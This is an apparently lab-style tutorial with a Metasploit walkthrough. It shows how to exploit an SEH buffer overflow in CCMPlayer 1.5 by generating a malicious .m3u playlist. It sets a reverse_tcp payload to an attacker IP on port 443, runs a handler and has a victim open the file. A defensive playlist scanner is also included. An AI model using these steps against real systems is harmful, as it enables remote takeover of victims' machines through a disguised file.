Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Vulnerable Application : CCMPlayer 1.5
Exploit Credits : Rh0
This module exploits a stack-based buffer overflow in CCMPlayer 1.5. When an .m3u playlist containing a long track name is opened, an SEH exception record can be overwritten with parts of the attacker-controlled buffer. SEH execution is triggered after an invalid read of an injectable address, thus allowing arbitrary code execution. This module works on multiple Windows platforms including Windows XP SP3, Windows Vista, and Windows 7.
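From the defender's side, the trigger condition described above (an overlong track name in a playlist) is easy to check for before a file reaches the player. The scanner below is an added example written for this page, not code from the exploit module or from CCMPlayer: it parses the EXTM3U format (a `#EXTINF:<seconds>,<title>` line followed by a path line) and flags entries whose title or path exceeds a length bound, or which carry non-printable bytes that a legitimate track name would not. The 260-byte threshold and the sample playlists are constructed assumptions, not values taken from the advisory.

```python
"""
Defensive .m3u scanner for the trigger condition described in the advisory
text: an overlong track name in a playlist. Flags entries whose file path or
#EXTINF title exceeds a length bound, and entries carrying non-printable bytes.
MAX_ENTRY_LEN is an assumed heuristic (MAX_PATH on Windows), not a value from
the exploit; tune it for your environment.
"""
from dataclasses import dataclass

MAX_ENTRY_LEN = 260  # assumed threshold: longer than any plausible Windows path


@dataclass
class Finding:
    line_no: int
    reason: str
    length: int


def _has_non_printable(payload: bytes) -> bool:
    # Track names and paths are printable text; undecodable bytes or control
    # characters are what injected address/shellcode material looks like.
    if not payload:
        return False
    try:
        text = payload.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return any(ord(ch) < 0x20 and ch != "\t" for ch in text)


def scan_m3u(data: bytes) -> list[Finding]:
    """Return findings for an .m3u/.m3u8 playlist supplied as raw bytes."""
    findings: list[Finding] = []
    for idx, raw in enumerate(data.splitlines(), start=1):
        line = raw.rstrip(b"\r")
        if not line.strip():
            continue
        if line.startswith(b"#EXTINF:"):
            # "#EXTINF:<seconds>,<title>": the title part is free-form text
            payload = line.split(b",", 1)[1] if b"," in line else b""
            kind = "EXTINF title"
        elif line.startswith(b"#"):
            continue  # other directives or comments are not track entries
        else:
            payload = line
            kind = "track path"
        if len(payload) > MAX_ENTRY_LEN:
            findings.append(Finding(idx, f"overlong {kind}", len(payload)))
        if _has_non_printable(payload):
            findings.append(Finding(idx, f"non-printable bytes in {kind}", len(payload)))
    return findings


def is_playlist_safe(data: bytes) -> bool:
    return not scan_m3u(data)


# Constructed sample playlists (not from the page): one benign, one with an
# overlong title and an overlong path of the kind the advisory describes.
BENIGN = b"#EXTM3U\n#EXTINF:123,Some Artist - Some Song\nC:\\Music\\song.mp3\n"
SUSPICIOUS = (
    b"#EXTM3U\n#EXTINF:1," + b"A" * 300 + b"\n" + b"C:\\" + b"B" * 2000 + b".mp3\n"
)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        for f in scan_m3u(blob):
            print(f"{name}: line {f.line_no}: {f.reason} ({f.length} bytes)")
        print(f"{name}: {'clean' if is_playlist_safe(blob) else 'FLAGGED'}")
```

Run it against a directory of downloaded playlists or wire `is_playlist_safe` into a mail-gateway or endpoint file-scan hook; a hit on an overlong entry is cheap to triage because playlist files are plain text and a legitimate track name is never hundreds of bytes long.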
1. Vulnerable application CCMPlayer 1.5 (view download link)
2. CCMPlayer 1.5 Exploit
Victim IP address : 192.168.8.91
Attacker IP address : 192.168.8.92
1. Download the vulnerable application, install it on your Windows operating system, and download the exploit above.
2. Open your terminal (CTRL + ALT + T) and copy the exploit into the following folder:
cp ccmplayer_m3u_bof.rb /pentest/exploits/framework/modules/exploits/windows/fileformat/
3. Open the Metasploit console by typing msfconsole in your terminal and use the exploit you just added.
4. Next, you can view the available options that you can set manually with the show options command. Below I configure only the minimum options needed to make this exploit work.
Information:
set filename great-songs.m3u --> set the name of the generated file
set lhost 192.168.8.92 --> set the attacker IP address
set lport 443 --> the attacker's local port that the victim connects back to
set target 0 --> set the target to CCMPlayer 1.5
exploit --> generate the malicious m3u file (the red box in the picture above is the location of the generated file)
5. Once you have located the malicious m3u file, you need to run a handler on the attacker computer to handle the payload we created earlier (reverse_tcp).
6. After the scenario is set up, the next step is to send the malicious file to the victim computer and make sure he/she opens it. Below is the picture of the victim trying to open the malicious m3u file.
7. After the victim opens the malicious file, our handler receives a new session from the victim computer…
1. As of the day I wrote this tutorial (24 December 2011), there is still no vendor update, i.e. this is a zero-day…
Hope you enjoy it 🙂